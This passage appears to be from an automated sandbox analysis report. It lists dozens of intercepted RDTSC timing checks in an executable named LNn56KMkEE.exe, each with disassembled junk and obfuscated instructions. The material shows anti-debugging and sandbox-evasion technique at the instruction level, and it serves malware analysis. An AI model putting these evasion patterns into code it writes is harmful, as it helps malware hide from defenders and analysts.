                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6962B0 second address: 6962CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jns 00007F2ADCE7BD66h 0x00000013 popad 0x00000014 push ecx 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 popad 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 696CFF second address: 696D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 68D23B second address: 68D247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2ADCE7BD66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 68D247 second address: 68D24C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 68D24C second address: 68D258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F2ADCE7BD66h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 68D258 second address: 68D25C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 68D25C second address: 68D262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 66099D second address: 6609AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2ADCE78B3Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 697147 second address: 69714D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 69714D second address: 69716C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007F2ADCE78B43h 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 69716C second address: 697172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 697172 second address: 697176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6979D8 second address: 6979DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6979DE second address: 697A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F2ADCE78B36h 0x0000000e jmp 00007F2ADCE78B48h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 697A04 second address: 697A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F2ADCE7BD73h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 697A33 second address: 697A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 697B9D second address: 697BA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 697BA1 second address: 697BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 697BA7 second address: 697BAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 69A191 second address: 69A197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 69A197 second address: 69A1A1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2ADCE7BD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6692E3 second address: 6692E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 69EC34 second address: 69EC38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6A38F7 second address: 6A38FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6A3DD4 second address: 6A3DDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6A41A1 second address: 6A41B6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jng 00007F2ADCE78B36h 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6A82D0 second address: 6A82FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F2ADCE7BD66h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2ADCE7BD76h 0x00000015 jl 00007F2ADCE7BD66h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6A7877 second address: 6A78A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B43h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2ADCE78B43h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6A7A21 second address: 6A7A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6A7A26 second address: 6A7A3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B44h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6A8005 second address: 6A800B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6A800B second address: 6A8020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F2ADCE78B3Dh 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6A8020 second address: 6A8029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AA108 second address: 6AA10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AA10E second address: 6AA112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AA112 second address: 6AA118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AA118 second address: 6AA128 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2ADCE7BD72h 0x00000008 jne 00007F2ADCE7BD66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6ABFED second address: 6AC076 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 06AEEFF6h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F2ADCE78B38h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D1B47h], ecx 0x0000002f call 00007F2ADCE78B39h 0x00000034 jmp 00007F2ADCE78B42h 0x00000039 push eax 0x0000003a jmp 00007F2ADCE78B42h 0x0000003f mov eax, dword ptr [esp+04h] 0x00000043 jmp 00007F2ADCE78B46h 0x00000048 mov eax, dword ptr [eax] 0x0000004a js 00007F2ADCE78B54h 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AC076 second address: 6AC07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AC3BF second address: 6AC3C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AC3C3 second address: 6AC3D1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2ADCE7BD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AC3D1 second address: 6AC3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AC3D5 second address: 6AC3D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AC3D9 second address: 6AC3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F2ADCE78B36h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AC3EB second address: 6AC3EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AC3EF second address: 6AC3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AC61E second address: 6AC623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6ACB97 second address: 6ACBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2ADCE78B44h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6ACBB7 second address: 6ACBBD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6ACC28 second address: 6ACC2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AD193 second address: 6AD198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AD198 second address: 6AD1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2ADCE78B36h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F2ADCE78B38h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b js 00007F2ADCE78B3Ch 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AD1CF second address: 6AD1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AE003 second address: 6AE022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2ADCE78B47h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AE022 second address: 6AE042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F2ADCE7BD68h 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AE042 second address: 6AE05E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2ADCE78B48h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6B082B second address: 6B0831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6B11EF second address: 6B121A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2ADCE78B48h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 ja 00007F2ADCE78B36h 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6B121A second address: 6B1224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F2ADCE7BD66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6B4CDB second address: 6B4CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6B5331 second address: 6B5335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6B5598 second address: 6B55A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F2ADCE78B36h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6B64EB second address: 6B64F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6B64F1 second address: 6B64F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6B9874 second address: 6B987A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6BAB0D second address: 6BAB27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jns 00007F2ADCE78B44h 0x00000011 pushad 0x00000012 jo 00007F2ADCE78B36h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6BBAAB second address: 6BBAAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6BBAAF second address: 6BBAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6BDB19 second address: 6BDB3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F2ADCE7BD6Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6BBAB5 second address: 6BBAD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F2ADCE78B36h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F2ADCE78B40h 0x00000017 jmp 00007F2ADCE78B3Ah 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C10D8 second address: 6C10F1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2ADCE7BD6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C11BB second address: 6C11CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jng 00007F2ADCE78B44h 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F2ADCE78B36h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C227D second address: 6C2283 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C2283 second address: 6C228D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2ADCE78B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C228D second address: 6C2291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C13DB second address: 6C13DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C13DF second address: 6C13F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C13F8 second address: 6C13FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C33C7 second address: 6C343A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F2ADCE7BD68h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 sub di, 6ABBh 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F2ADCE7BD68h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 mov bx, 19C0h 0x0000004a pushad 0x0000004b jmp 00007F2ADCE7BD6Ah 0x00000050 mov bl, 73h 0x00000052 popad 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 je 00007F2ADCE7BD6Ch 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C343A second address: 6C343E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C2503 second address: 6C2508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C2508 second address: 6C250E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C250E second address: 6C2512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C2512 second address: 6C2521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C2521 second address: 6C2525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C2525 second address: 6C252B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C252B second address: 6C2535 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2ADCE7BD6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C4546 second address: 6C4550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F2ADCE78B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C4550 second address: 6C4564 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2ADCE7BD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C4564 second address: 6C4569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C6375 second address: 6C6381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
